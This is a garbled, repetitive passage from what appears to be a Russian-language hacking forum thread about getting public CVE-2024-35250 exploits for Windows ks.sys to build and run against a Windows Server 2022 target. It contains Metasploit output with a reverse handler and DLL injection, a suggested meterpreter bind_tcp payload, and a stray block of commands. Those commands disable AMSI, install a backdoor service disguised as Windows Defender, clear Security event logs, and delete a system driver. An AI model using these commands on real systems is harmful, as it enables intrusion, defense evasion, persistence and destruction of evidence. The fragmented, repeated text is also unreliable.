del
Последнее редактирование:
Это жизнь.Антивирус снес, дефендер тоже
офтоп, но вот эта строчка это жизнено Exploit completed, but no session was created. я помню тоже чето делал с cve и у меня точно такая же строчка была и я конечно был огорчен и забил)https://github.com/yinsel/CVE-2024-35250-BOF - это решение собрать не могу(несколько ошибок в visual studio)
https://github.com/varwara/CVE-2024-35250 - зависает при сборки
в метасплоите:
И ничего не происходит. Антивирус снес, дефендер тожеКод:[*] Started reverse TCP handler on IP:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022 [*] Launching notepad to host the exploit... [*] The notepad path is: C:\Windows\System32\notepad.exe [*] The notepad pid is: 12732 [*] Reflectively injecting the DLL into 12732... [*] Exploit completed, but no session was created.
https://github.com/yinsel/CVE-2024-35250-BOF - это решение собрать не могу(несколько ошибок в visual studio)
1>Done building project "CVE-2024-35250-BOF.vcxproj".
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========
========== Build completed at 1:16 PM and took 11.159 seconds ==========
https://github.com/yinsel/CVE-2024-35250-BOF - это решение собрать не могу(несколько ошибок в visual studio)
https://github.com/varwara/CVE-2024-35250 - зависает при сборки
в метасплоите:
И ничего не происходит. Антивирус снес, дефендер тожеКод:[*] Started reverse TCP handler on IP:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022 [*] Launching notepad to host the exploit... [*] The notepad path is: C:\Windows\System32\notepad.exe [*] The notepad pid is: 12732 [*] Reflectively injecting the DLL into 12732... [*] Exploit completed, but no session was created.
Так ты же получишь ELF файл. Как ты его потом запускать на Windows собираешься? Тебе VS по умолчанию нужна, для компиляции эксплойтов под Windows-системы. Еще и мудришь что-то с объектным файлом.в linux не могу собрать в финальную программу файл.
пробовал g++ file.o
Поддерживаю. Поставь VS и не усложняй себе жизнь.Тебе VS по умолчанию нужна, для компиляции эксплойтов под Windows-системы.
--strip-signatures). ```powershell
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\AMSI" -Name "Enable" -Value 0 -Force
```
```c
DeviceIoControl(hDevice, 0x9C402564, &payload, sizeof(payload), NULL, 0, &bytesReturned, NULL);
```
```bat
sc create "WindowsDefenderSecurity" binPath= "C:\temp\backdoor.exe" type= own start= auto
```
```bat
wevtutil cl Security /bu:backup.evtx
```
```powershell
Remove-Item -Path C:\Windows\System32\drivers\ks.sys -Force
```
-z).попробуй другой пейлоудhttps://github.com/yinsel/CVE-2024-35250-BOF - это решение собрать не могу(несколько ошибок в visual studio)
https://github.com/varwara/CVE-2024-35250 - зависает при сборки
в метасплоите:
И ничего не происходит. Антивирус снес, дефендер тожеКод:[*] Started reverse TCP handler on IP:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022 [*] Launching notepad to host the exploit... [*] The notepad path is: C:\Windows\System32\notepad.exe [*] The notepad pid is: 12732 [*] Reflectively injecting the DLL into 12732... [*] Exploit completed, but no session was created.
set payload windows/x64/meterpreter/bind_tcp